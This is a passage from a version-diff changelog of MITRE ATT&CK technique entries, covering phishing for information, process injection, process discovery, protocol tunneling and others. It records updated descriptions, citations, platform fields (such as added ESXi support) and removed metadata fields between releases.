Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth) |
| external_references[1]['description'] | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved November 17, 2024. |
| x_mitre_version | 2.6 | 2.7 |
[T1598] Phishing for Information
Current version: 1.4
Version changed from: 1.3 → 1.4
|
|
|---|
| t | Adversaries may send phishing messages to elicit sensitive i | t | Adversaries may send phishing messages to elicit sensitive i |
| nformation that can be used during targeting. Phishing for i | | nformation that can be used during targeting. Phishing for i |
| nformation is an attempt to trick targets into divulging inf | | nformation is an attempt to trick targets into divulging inf |
| ormation, frequently credentials or other actionable informa | | ormation, frequently credentials or other actionable informa |
| tion. Phishing for information is different from [Phishing]( | | tion. Phishing for information is different from [Phishing]( |
| https://attack.mitre.org/techniques/T1566) in that the objec | | https://attack.mitre.org/techniques/T1566) in that the objec |
| tive is gathering data from the victim rather than executing | | tive is gathering data from the victim rather than executing |
| malicious code. All forms of phishing are electronically d | | malicious code. All forms of phishing are electronically d |
| elivered social engineering. Phishing can be targeted, known | | elivered social engineering. Phishing can be targeted, known |
| as spearphishing. In spearphishing, a specific individual, | | as spearphishing. In spearphishing, a specific individual, |
| company, or industry will be targeted by the adversary. More | | company, or industry will be targeted by the adversary. More |
| generally, adversaries can conduct non-targeted phishing, s | | generally, adversaries can conduct non-targeted phishing, s |
| uch as in mass credential harvesting campaigns. Adversaries | | uch as in mass credential harvesting campaigns. Adversaries |
| may also try to obtain information directly through the exc | | may also try to obtain information directly through the exc |
| hange of emails, instant messages, or other electronic conve | | hange of emails, instant messages, or other electronic conve |
| rsation means.(Citation: ThreatPost Social Media Phishing)(C | | rsation means.(Citation: ThreatPost Social Media Phishing)(C |
| itation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Ci | | itation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Ci |
| tation: Sophos Attachment)(Citation: GitHub Phishery) Victim | | tation: Sophos Attachment)(Citation: GitHub Phishery) Victim |
| s may also receive phishing messages that direct them to cal | | s may also receive phishing messages that direct them to cal |
| l a phone number where the adversary attempts to collect con | | l a phone number where the adversary attempts to collect con |
| fidential information.(Citation: Avertium callback phishing) | | fidential information.(Citation: Avertium callback phishing) |
| Phishing for information frequently involves social engine | | Phishing for information frequently involves social engine |
| ering techniques, such as posing as a source with a reason t | | ering techniques, such as posing as a source with a reason t |
| o collect information (ex: [Establish Accounts](https://atta | | o collect information (ex: [Establish Accounts](https://atta |
| ck.mitre.org/techniques/T1585) or [Compromise Accounts](http | | ck.mitre.org/techniques/T1585) or [Compromise Accounts](http |
| s://attack.mitre.org/techniques/T1586)) and/or sending multi | | s://attack.mitre.org/techniques/T1586)) and/or sending multi |
| ple, seemingly urgent messages. Another way to accomplish th | | ple, seemingly urgent messages. Another way to accomplish th |
| is is by forging or spoofing(Citation: Proofpoint-spoof) the | | is is by [Email Spoofing](https://attack.mitre.org/technique |
| identity of the sender which can be used to fool both the h | | s/T1672)(Citation: Proofpoint-spoof) the identity of the sen |
| uman recipient as well as automated security tools.(Citation | | der, which can be used to fool both the human recipient as w |
| : cyberproof-double-bounce) Phishing for information may a | | ell as automated security tools.(Citation: cyberproof-double |
| lso involve evasive techniques, such as removing or manipula | | -bounce) Phishing for information may also involve evasive |
| ting emails or metadata/headers from compromised accounts be | | techniques, such as removing or manipulating emails or meta |
| ing abused to send messages (e.g., [Email Hiding Rules](http | | data/headers from compromised accounts being abused to send |
| s://attack.mitre.org/techniques/T1564/008)).(Citation: Micro | | messages (e.g., [Email Hiding Rules](https://attack.mitre.or |
| soft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infost | | g/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 202 |
| ealer 2014) | | 2)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-05-31 04:18:44.570000+00:00 | 2025-04-15 19:59:08.689000+00:00 |
| description | Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.
All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.
Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)
Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce)
Phishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) | Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.
All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.
Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)
Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by [Email Spoofing](https://attack.mitre.org/techniques/T1672)(Citation: Proofpoint-spoof) the identity of the sender, which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce)
Phishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) |
| external_references[1]['description'] | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved November 17, 2024. |
| x_mitre_version | 1.3 | 1.4 |
[T1027.014] Obfuscated Files or Information: Polymorphic Code
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Signature-based Detection'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-09 18:56:28.092000+00:00 | 2025-04-15 19:59:00.006000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
[T1205.001] Traffic Signaling: Port Knocking
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-11 18:31:23.996000+00:00 | 2025-04-15 19:58:49.044000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_platforms[3] | Network | Network Devices |
[T1547.010] Boot or Logon Autostart Execution: Port Monitors
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_effective_permissions | ['SYSTEM'] | |
| x_mitre_permissions_required | ['SYSTEM', 'Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 15:26:17.886000+00:00 | 2025-04-15 19:58:26.452000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
[T1055.002] Process Injection: Portable Executable Injection
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Application control'] | |
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-18 12:21:11.178000+00:00 | 2025-04-15 19:58:46.232000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1653] Power Settings
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-16 20:11:40.334000+00:00 | 2025-04-15 19:59:18.299000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[3] | Network | Network Devices |
[T1059.001] Command and Scripting Interpreter: PowerShell
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | True | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:39:13.228000+00:00 | 2025-04-15 19:58:52.378000+00:00 |
| x_mitre_version | 1.4 | 1.5 |
[T1546.013] Event Triggered Execution: PowerShell Profile
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-20 17:04:13.976000+00:00 | 2025-04-15 19:58:06.292000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1542] Pre-OS Boot
Current version: 1.3
Version changed from: 1.2 → 1.3
New Detections:
- DS0022: File (File Creation)
- DS0022: File (File Modification)
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Host intrusion prevention systems', 'File monitoring'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-02-26 14:26:14.364000+00:00 | 2025-04-15 19:58:45.876000+00:00 |
| external_references[1]['description'] | Pinola, M. (2014, December 14). 3 tools to check your hard drive's health and make sure it's not already dying on you. Retrieved October 2, 2018. | Pinola, M. (2014, December 14). 3 tools to check your hard drive's health and make sure it's not already dying on you. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html | https://www.computerworld.com/article/1484887/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html |
| x_mitre_version | 1.2 | 1.3 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_data_sources | | File: File Modification |
| x_mitre_data_sources | | File: File Creation |
| x_mitre_platforms | | Network Devices |
iterable_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | Network | |
[T1547.012] Boot or Logon Autostart Execution: Print Processors
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator', 'SYSTEM'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-04 14:16:17.655000+00:00 | 2025-04-15 19:58:17.860000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1552.004] Unsecured Credentials: Private Keys
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-04 11:31:56.622000+00:00 | 2025-04-15 19:58:35.201000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
| x_mitre_platforms[3] | Network | Network Devices |
[T1055.009] Process Injection: Proc Memory
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Application control', 'Anti-virus'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-06-20 22:25:55.331000+00:00 | 2025-04-15 19:59:10.291000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
[T1564.010] Hide Artifacts: Process Argument Spoofing
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-11-29 15:56:50.370000+00:00 | 2025-04-15 19:59:25.123000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
[T1057] Process Discovery
Current version: 1.6
Version changed from: 1.5 → 1.6
|
|
|---|
| t | Adversaries may attempt to get information about running pro | t | Adversaries may attempt to get information about running pro |
| cesses on a system. Information obtained could be used to ga | | cesses on a system. Information obtained could be used to ga |
| in an understanding of common software/applications running | | in an understanding of common software/applications running |
| on systems within the network. Administrator or otherwise el | | on systems within the network. Administrator or otherwise el |
| evated access may provide better process details. Adversarie | | evated access may provide better process details. Adversarie |
| s may use the information from [Process Discovery](https://a | | s may use the information from [Process Discovery](https://a |
| ttack.mitre.org/techniques/T1057) during automated discovery | | ttack.mitre.org/techniques/T1057) during automated discovery |
| to shape follow-on behaviors, including whether or not the | | to shape follow-on behaviors, including whether or not the |
| adversary fully infects the target and/or attempts specific | | adversary fully infects the target and/or attempts specific |
| actions. In Windows environments, adversaries could obtain | | actions. In Windows environments, adversaries could obtain |
| details on running processes using the [Tasklist](https://at | | details on running processes using the [Tasklist](https://at |
| tack.mitre.org/software/S0057) utility via [cmd](https://att | | tack.mitre.org/software/S0057) utility via [cmd](https://att |
| ack.mitre.org/software/S0106) or <code>Get-Process</code> vi | | ack.mitre.org/software/S0106) or <code>Get-Process</code> vi |
| a [PowerShell](https://attack.mitre.org/techniques/T1059/001 | | a [PowerShell](https://attack.mitre.org/techniques/T1059/001 |
| ). Information about processes can also be extracted from th | | ). Information about processes can also be extracted from th |
| e output of [Native API](https://attack.mitre.org/techniques | | e output of [Native API](https://attack.mitre.org/techniques |
| /T1106) calls such as <code>CreateToolhelp32Snapshot</code>. | | /T1106) calls such as <code>CreateToolhelp32Snapshot</code>. |
| In Mac and Linux, this is accomplished with the <code>ps</c | | In Mac and Linux, this is accomplished with the <code>ps</c |
| ode> command. Adversaries may also opt to enumerate processe | | ode> command. Adversaries may also opt to enumerate processe |
| s via `/proc`. On network devices, [Network Device CLI](ht | | s via `/proc`. ESXi also supports use of the `ps` command, a |
| tps://attack.mitre.org/techniques/T1059/008) commands such a | | s well as `esxcli system process list`.(Citation: Sygnia ESX |
| s `show processes` can be used to display current running pr | | i Ransomware 2025)(Citation: Crowdstrike Hypervisor Jackpott |
| ocesses.(Citation: US-CERT-TA18-106A)(Citation: show_process | | ing Pt 2 2021) On network devices, [Network Device CLI](htt |
| es_cisco_cmd) | | ps://attack.mitre.org/techniques/T1059/008) commands such as |
| | | `show processes` can be used to display current running pro |
| | | cesses.(Citation: US-CERT-TA18-106A)(Citation: show_processe |
| | | s_cisco_cmd) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-16 12:43:55.369000+00:00 | 2025-04-15 19:58:50.607000+00:00 |
| description | Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Administrator or otherwise elevated access may provide better process details. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via `/proc`.
On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd) | Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Administrator or otherwise elevated access may provide better process details. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via `/proc`. ESXi also supports use of the `ps` command, as well as `esxcli system process list`.(Citation: Sygnia ESXi Ransomware 2025)(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)
On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd) |
| x_mitre_version | 1.5 | 1.6 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Crowdstrike Hypervisor Jackpotting Pt 2 2021', 'description': 'Michael Dawson. (2021, August 30). Hypervisor Jackpotting, Part 2: eCrime Actors Increase Targeting of ESXi Servers with Ransomware. Retrieved March 26, 2025.', 'url': 'https://www.crowdstrike.com/en-us/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/'} |
| external_references | | {'source_name': 'Sygnia ESXi Ransomware 2025', 'description': 'Zhongyuan Hau (Aaron), Ren Jie Yow, and Yoav Mazor. (2025, January 21). ESXi Ransomware Attacks: Stealthy Persistence through. Retrieved March 27, 2025.', 'url': 'https://www.sygnia.co/blog/esxi-ransomware-ssh-tunneling-defense-strategies/'} |
| x_mitre_platforms | | Network Devices |
| x_mitre_platforms | | ESXi |
iterable_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | Network | |
[T1055.013] Process Injection: Process Doppelgänging
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Application control'] | |
| x_mitre_permissions_required | ['Administrator', 'SYSTEM', 'User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-02-09 15:43:48.848000+00:00 | 2025-04-15 19:58:40.683000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
[T1055.012] Process Injection: Process Hollowing
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Application control', 'Anti-virus'] | |
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 15:11:45.602000+00:00 | 2025-04-15 19:58:58.724000+00:00 |
| x_mitre_version | 1.3 | 1.4 |
[T1055] Process Injection
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Application control', 'Anti-virus'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-30 21:01:45.488000+00:00 | 2025-04-16 20:37:16.893000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.3 | 1.4 |
[T1572] Protocol Tunneling
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Adversaries may tunnel network communications to and from a | t | Adversaries may tunnel network communications to and from a |
| victim system within a separate protocol to avoid detection/ | | victim system within a separate protocol to avoid detection/ |
| network filtering and/or enable access to otherwise unreacha | | network filtering and/or enable access to otherwise unreacha |
| ble systems. Tunneling involves explicitly encapsulating a p | | ble systems. Tunneling involves explicitly encapsulating a p |
| rotocol within another. This behavior may conceal malicious | | rotocol within another. This behavior may conceal malicious |
| traffic by blending in with existing traffic and/or provide | | traffic by blending in with existing traffic and/or provide |
| an outer layer of encryption (similar to a VPN). Tunneling c | | an outer layer of encryption (similar to a VPN). Tunneling c |
| ould also enable routing of network packets that would other | | ould also enable routing of network packets that would other |
| wise not reach their intended destination, such as SMB, RDP, | | wise not reach their intended destination, such as SMB, RDP, |
| or other traffic that would be filtered by network applianc | | or other traffic that would be filtered by network applianc |
| es or not routed over the Internet. There are various mean | | es or not routed over the Internet. There are various mean |
| s to encapsulate a protocol within another protocol. For exa | | s to encapsulate a protocol within another protocol. For exa |
| mple, adversaries may perform SSH tunneling (also known as S | | mple, adversaries may perform SSH tunneling (also known as S |
| SH port forwarding), which involves forwarding arbitrary dat | | SH port forwarding), which involves forwarding arbitrary dat |
| a over an encrypted SSH tunnel.(Citation: SSH Tunneling) [ | | a over an encrypted SSH tunnel.(Citation: SSH Tunneling)(Cit |
| Protocol Tunneling](https://attack.mitre.org/techniques/T157 | | ation: Sygnia Abyss Locker 2025) [Protocol Tunneling](http |
| 2) may also be abused by adversaries during [Dynamic Resolut | | s://attack.mitre.org/techniques/T1572) may also be abused by |
| ion](https://attack.mitre.org/techniques/T1568). Known as DN | | adversaries during [Dynamic Resolution](https://attack.mitr |
| S over HTTPS (DoH), queries to resolve C2 infrastructure may | | e.org/techniques/T1568). Known as DNS over HTTPS (DoH), quer |
| be encapsulated within encrypted HTTPS packets.(Citation: B | | ies to resolve C2 infrastructure may be encapsulated within |
| leepingComp Godlua JUL19) Adversaries may also leverage [P | | encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19 |
| rotocol Tunneling](https://attack.mitre.org/techniques/T1572 | | ) Adversaries may also leverage [Protocol Tunneling](https |
| ) in conjunction with [Proxy](https://attack.mitre.org/techn | | ://attack.mitre.org/techniques/T1572) in conjunction with [P |
| iques/T1090) and/or [Protocol or Service Impersonation](http | | roxy](https://attack.mitre.org/techniques/T1090) and/or [Pro |
| s://attack.mitre.org/techniques/T1001/003) to further concea | | tocol or Service Impersonation](https://attack.mitre.org/tec |
| l C2 communications and infrastructure. | | hniques/T1001/003) to further conceal C2 communications and |
| | | infrastructure. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-27 17:15:35.372000+00:00 | 2025-04-15 19:58:29.875000+00:00 |
| description | Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet.
There are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling)
[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19)
Adversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure. | Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet.
There are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling)(Citation: Sygnia Abyss Locker 2025)
[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19)
Adversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure. |
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Sygnia Abyss Locker 2025', 'description': 'Abigail See, Zhongyuan (Aaron) Hau, Ren Jie Yow, Yoav Mazor, Omer Kidron, and Oren Biderman. (2025, February 4). The Anatomy of Abyss Locker Ransomware Attack. Retrieved April 4, 2025.', 'url': 'https://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/'} |
| x_mitre_platforms | | ESXi |
[T1001.003] Data Obfuscation: Protocol or Service Impersonation
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-09 15:40:19.436000+00:00 | 2025-04-15 19:59:05.377000+00:00 |
| x_mitre_version | 2.0 | 2.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1090] Proxy
Current version: 3.2
Version changed from: 3.1 → 3.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-08-30 19:16:11.648000+00:00 | 2025-04-15 19:58:41.686000+00:00 |
| x_mitre_version | 3.1 | 3.2 |
| x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1055.008] Process Injection: Ptrace System Calls
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Application control'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-18 12:26:31.766000+00:00 | 2025-04-15 19:59:18.215000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1216.001] System Script Proxy Execution: PubPrn
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Digital Certificate Validation', 'Application Control'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-18 14:55:35.817000+00:00 | 2025-04-16 20:37:14.984000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 2.0 | 2.1 |
[T1071.005] Application Layer Protocol: Publish/Subscribe Protocols
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-16 13:08:35.629000+00:00 | 2025-04-15 19:58:14.152000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[3] | Network | Network Devices |
[T1059.006] Command and Scripting Interpreter: Python
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | False | |
| x_mitre_system_requirements | ['Python is installed.'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-01-30 18:35:58.021000+00:00 | 2025-04-15 19:59:08.245000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1037.004] Boot or Logon Initialization Scripts: RC Scripts
Current version: 2.2
Version changed from: 2.1 → 2.2
|
|
|---|
| t | Adversaries may establish persistence by modifying RC script | t | Adversaries may establish persistence by modifying RC script |
| s which are executed during a Unix-like system’s startup. Th | | s, which are executed during a Unix-like system’s startup. T |
| ese files allow system administrators to map and start custo | | hese files allow system administrators to map and start cust |
